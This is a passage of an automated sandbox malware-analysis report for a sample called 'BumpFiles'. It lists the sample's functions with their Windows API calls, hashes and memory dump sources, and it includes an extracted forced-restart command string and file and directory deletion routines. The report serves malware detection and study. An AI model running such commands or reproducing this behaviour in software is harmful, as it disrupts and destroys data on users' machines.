                                                                    • API ID: Sleep$Exec
                                                                    • String ID: C:\WINDOWS\system32\shutdown.exe -r -t 1 -f$:c
                                                                    • API String ID: 1325486322-1912651170
                                                                    • Opcode ID: 9084fd4ac988e11f2c88bee64eed603d8c020462e05fad206a0e38efbd5631f5
                                                                    • Instruction ID: f61db4da6c67bcbcc9485dc9ace913e51ddd331a7a87c05aa1dac2d289d3923f
                                                                    • Opcode Fuzzy Hash: 9084fd4ac988e11f2c88bee64eed603d8c020462e05fad206a0e38efbd5631f5
                                                                    • Instruction Fuzzy Hash: ABD01230794B507DF11266667C23F197B4DD38AF14FD30466F601555D195B9641044ED
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0042547C Relevance: 7.5, APIs: 5, Instructions: 41fileCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 504 42547c-425499 call 40a8a4 DeleteFileW 507 4254d1-4254d7 504->507 508 42549b-4254ab GetLastError GetFileAttributesW 504->508 509 4254cb-4254cc SetLastError 508->509 510 4254ad-4254b0 508->510 509->507 510->509 511 4254b2-4254b4 510->511 511->509 512 4254b6-4254c9 call 40a8a4 RemoveDirectoryW 511->512 512->507
                                                                    APIs
                                                                    • DeleteFileW.KERNEL32(00000000,?,?,?,?,0063989C,00639966,00000000,0063998E,?,?,00000000,00000000,?,?,00633AC1), ref: 0042548C
                                                                    • GetLastError.KERNEL32(00000000,?,?,?,?,0063989C,00639966,00000000,0063998E,?,?,00000000,00000000,?,?,00633AC1), ref: 0042549B
                                                                    • GetFileAttributesW.KERNEL32(00000000,00000000,?,?,?,?,0063989C,00639966,00000000,0063998E,?,?,00000000,00000000,?), ref: 004254A3
                                                                    • RemoveDirectoryW.KERNEL32(00000000,00000000,00000000,?,?,?,?,0063989C,00639966,00000000,0063998E,?,?,00000000,00000000,?), ref: 004254BE
                                                                    • SetLastError.KERNEL32(00000000,00000000,00000000,?,?,?,?,0063989C,00639966,00000000,0063998E,?,?,00000000,00000000,?), ref: 004254CC
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3855472220.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.3855448670.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855698169.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855735386.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855773837.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855878320.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856837977.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856903728.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856938647.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856938647.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFileLast$AttributesDeleteDirectoryRemove
                                                                    • String ID:
                                                                    • API String ID: 2814369299-0
                                                                    • Opcode ID: 52b62b36ed035377a1cc14c9da3cf4576dfee31e94e5de9ac3c5267e47e7e224
                                                                    • Instruction ID: ced7317d0bb7603919c6f65922b20b3b5ec63e78df0876d40d037117c1771166
                                                                    • Opcode Fuzzy Hash: 52b62b36ed035377a1cc14c9da3cf4576dfee31e94e5de9ac3c5267e47e7e224
                                                                    • Instruction Fuzzy Hash: 44F08261301B2019A91035BE28C1BBF51488DC276FB94073BF944D2292D92D4C86419E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 005EE0E8 Relevance: 3.1, APIs: 2, Instructions: 104COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 005EE1C9
                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 005EE1E0
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3855472220.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.3855448670.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855698169.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855735386.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855773837.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855878320.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856837977.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856903728.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856938647.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856938647.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: LongWindow
                                                                    • String ID:
                                                                    • API String ID: 1378638983-0
                                                                    • Opcode ID: a032363e6cd12d6b15dd093dad1e4387557bbf03b2e8300dc75afd9b24e6e34b
                                                                    • Instruction ID: 49b3cee1a357ac9e4b63db1826b3323ea065a8a199be338292a45e01145cc57d
                                                                    • Opcode Fuzzy Hash: a032363e6cd12d6b15dd093dad1e4387557bbf03b2e8300dc75afd9b24e6e34b
                                                                    • Instruction Fuzzy Hash: AA418234A04684EFDB18CF69C886A9DBBF6FB49300F6185E5E850A7391C7349E41DB10
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004FBC54 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3855472220.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.3855448670.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855698169.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855735386.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855773837.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855878320.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856837977.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856903728.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856938647.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856938647.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: DrivesLogical
                                                                    • String ID:
                                                                    • API String ID: 999431828-0
                                                                    • Opcode ID: 62b0111acc6d7500fee279ba086fabc795d41589a45b3604784586583c8a09a5
                                                                    • Instruction ID: cfc2e6f8fefccddeca35f4d7415591228e66a85ecad90ab14efd8280bdd51e8a
                                                                    • Opcode Fuzzy Hash: 62b0111acc6d7500fee279ba086fabc795d41589a45b3604784586583c8a09a5
                                                                    • Instruction Fuzzy Hash: B6F0AF367040454BDB147A79C8445BE72D2DB82365F05853FF680D7391DB698C82C799
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00407CFB Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CompareStringW.KERNEL32(0000007F,00000001,00000000,00000000,00000000,00000000,00000000,00407D6A,?,?,?,00000000), ref: 00407D49
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3855472220.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.3855448670.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855698169.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855735386.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855773837.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855878320.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856837977.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856903728.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856938647.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856938647.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: CompareString
                                                                    • String ID:
                                                                    • API String ID: 1825529933-0
                                                                    • Opcode ID: 41aa4a8758972083fda76d886b23328867988b7c9d560f1c8c924052a9eedc68
                                                                    • Instruction ID: 875274e2c4264f451e6ad1d12119ad3db8eed83e6ea6ef1fa48c92378bfb3a92
                                                                    • Opcode Fuzzy Hash: 41aa4a8758972083fda76d886b23328867988b7c9d560f1c8c924052a9eedc68
                                                                    • Instruction Fuzzy Hash: E5F0AF756486447EDB11F779CC82E5E73ACDF88704B2104BAF400F2292E6BD5E04962A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00424AA8 Relevance: 1.5, APIs: 1, Instructions: 33fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(00000000,000000F0,000000F0,00000000,00000003,00000080,00000000,00000000,?,00492358,004B577C,00000000,004B57FC,?,?,00492358), ref: 00424AF7
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3855472220.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.3855448670.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855698169.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855735386.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855773837.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855878320.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856837977.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856903728.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856938647.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856938647.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    • Opcode ID: 9ecc51064a450b2074c856a3397e67820b78e609e57d340f9dfba975a6b0ee07
                                                                    • Instruction ID: e2f9c666573fb2808d607b15e87b5e3c477fa8a4b1fd6f0362a75845dbd106c2
                                                                    • Opcode Fuzzy Hash: 9ecc51064a450b2074c856a3397e67820b78e609e57d340f9dfba975a6b0ee07
                                                                    • Instruction Fuzzy Hash: 2AE02BF2B401202EF360759EACC1B0B914EC7D6775F160132F304E72C2D4D88C0142AC
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00424B00 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(00000000,C0000000,00000004,00000000,00000004,00000080,00000000,00000000,?,00492358,004B5711,00000000,004B57FC,?,?,00492358), ref: 00424B49
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3855472220.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.3855448670.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855698169.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855735386.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855773837.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855878320.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856837977.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856903728.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856938647.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856938647.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    • Opcode ID: b2d8e0899d24d89a908864b73a35a3fcbe6edd53455a76d7d404e430976054b4
                                                                    • Instruction ID: 25a1fbbc8100fa346d3677f3a20588944441c3efe3b912ced1bbf1de9f64e288
                                                                    • Opcode Fuzzy Hash: b2d8e0899d24d89a908864b73a35a3fcbe6edd53455a76d7d404e430976054b4
                                                                    • Instruction Fuzzy Hash: 5FE0DFE7B001242AF35079AEAC82F6B914DCB927B9F060236FB10EB2C1D458DC0182E8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040C498 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleFileNameW.KERNEL32(00400000,?,0000020A), ref: 0040C4B6
                                                                      • Part of subcall function 0040D70C: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040D7C6,?,00400000,00646C1C), ref: 0040D748
                                                                      • Part of subcall function 0040D70C: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040D7C6,?,00400000,00646C1C), ref: 0040D799
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3855472220.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.3855448670.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855698169.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855735386.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855773837.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855878320.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856837977.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856903728.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856938647.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856938647.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: FileModuleName$LibraryLoad
                                                                    • String ID:
                                                                    • API String ID: 4113206344-0
                                                                    • Opcode ID: b00471fcab1b5f395def946c6beb6615941054bb9164cc0f92cc80501cac9ca7
                                                                    • Instruction ID: 3a4ae58969193307bce1041edd5d9d761091ef52682c61390113b32e0b793339
                                                                    • Opcode Fuzzy Hash: b00471fcab1b5f395def946c6beb6615941054bb9164cc0f92cc80501cac9ca7
                                                                    • Instruction Fuzzy Hash: 92E0ED71A00310DBCB10DFA8D8C5A5737E4AB08754F0446A6ED14DF386D375DD1487D5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004258EC Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000,?,00633459,00000000,006334CB), ref: 004258F9
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3855472220.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.3855448670.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855698169.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855735386.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855773837.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855878320.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856837977.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856903728.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856938647.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856938647.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: CreateDirectory
                                                                    • String ID:
                                                                    • API String ID: 4241100979-0
                                                                    • Opcode ID: 5111e6a9ea1a0a8007502bc41357b664fad3781dd6291e7cd61967ad68ac8ba3
                                                                    • Instruction ID: 46824d620446ac42301a83f1bbebc4f76fd1fdc196ae92059cb092e69fd8102b
                                                                    • Opcode Fuzzy Hash: 5111e6a9ea1a0a8007502bc41357b664fad3781dd6291e7cd61967ad68ac8ba3
                                                                    • Instruction Fuzzy Hash: 00B092A27513402AEA0039FA5CC2B2E008C9B5460EF10083AF111D6282E4AEC8950055
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00409D7C Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SysAllocStringLen.OLEAUT32(00000000,?), ref: 00409D83
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3855472220.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.3855448670.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855698169.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855735386.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855773837.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855878320.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856837977.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856903728.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856938647.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856938647.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: AllocString
                                                                    • String ID:
                                                                    • API String ID: 2525500382-0
                                                                    • Opcode ID: dd0b7af6829fdb8ea53ff36f0f1c6947d542e7e52d8e55ddb7a24222a2ffb2fc
                                                                    • Instruction ID: eb0268cde3c4aeac134fbb2095324f8aaea440d50eeb766d39aaf95ab0d612a7
                                                                    • Opcode Fuzzy Hash: dd0b7af6829fdb8ea53ff36f0f1c6947d542e7e52d8e55ddb7a24222a2ffb2fc
                                                                    • Instruction Fuzzy Hash: F2B0122429870320FA1020325E01B37004C4F00341FC4017F6C2AF01C3EA3DCC019C7E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040F134 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3855472220.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.3855448670.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855698169.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855735386.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855773837.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855878320.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856837977.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856903728.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856938647.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856938647.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: InfoSystem
                                                                    • String ID:
                                                                    • API String ID: 31276548-0
                                                                    • Opcode ID: 84ad2fbfb8aecb0fe2e08319b56d833cf1bf3e3b20a4b6675d57978a842bf5d4
                                                                    • Instruction ID: c9d0dbab03ec1449dfd6cadc3055f85912d320d9fe12348b59d5370955ded952
                                                                    • Opcode Fuzzy Hash: 84ad2fbfb8aecb0fe2e08319b56d833cf1bf3e3b20a4b6675d57978a842bf5d4
                                                                    • Instruction Fuzzy Hash: 3DA012244089001AC404A7197C4340F31805D41114FC40B68745CB52C2E619C5640BDB
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%